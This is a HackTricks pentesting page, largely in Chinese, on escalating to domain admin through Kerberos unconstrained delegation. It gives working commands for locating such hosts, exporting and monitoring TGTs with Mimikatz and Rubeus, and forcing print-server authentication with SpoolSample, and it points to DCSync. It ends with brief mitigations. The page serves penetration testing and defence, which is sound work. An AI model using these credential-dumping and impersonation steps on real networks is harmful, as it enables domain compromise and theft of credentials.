Unconstrained Delegation

Support HackTricks

Unconstrained delegation

这是一个域管理员可以设置在域内任何计算机上的功能。然后,每当用户登录到该计算机时,该用户的TGT副本将被发送到DC提供的TGS中保存在LSASS的内存中。因此,如果您在该机器上拥有管理员权限,您将能够转储票证并在任何机器上冒充用户

因此,如果域管理员登录到启用了“无约束委派”功能的计算机,并且您在该机器上拥有本地管理员权限,您将能够转储票证并在任何地方冒充域管理员(域权限提升)。

您可以通过检查userAccountControl属性是否包含ADS_UF_TRUSTED_FOR_DELEGATION查找具有此属性的计算机对象。您可以使用LDAP过滤器‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’来执行此操作,这正是powerview所做的:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

使用MimikatzRubeus在内存中加载管理员(或受害者用户)的票证以进行票证传递 更多信息:https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ 有关无约束委派的更多信息,请访问ired.team。

强制身份验证

如果攻击者能够攻陷允许“无约束委派”的计算机,他可以欺骗一个打印服务器,使其自动登录在服务器的内存中保存TGT。 然后,攻击者可以执行票证传递攻击以冒充用户打印服务器计算机帐户。

要使打印服务器登录到任何机器,您可以使用SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

如果 TGT 来自域控制器,您可以执行一个 DCSync attack 并从 DC 获取所有哈希。 有关此攻击的更多信息,请访问 ired.team。

以下是尝试强制身份验证的其他方法:

Force NTLM Privileged Authentication

缓解措施

  • 将 DA/Admin 登录限制为特定服务

  • 为特权账户设置“账户是敏感的,无法被委派”。

支持 HackTricks

Last updated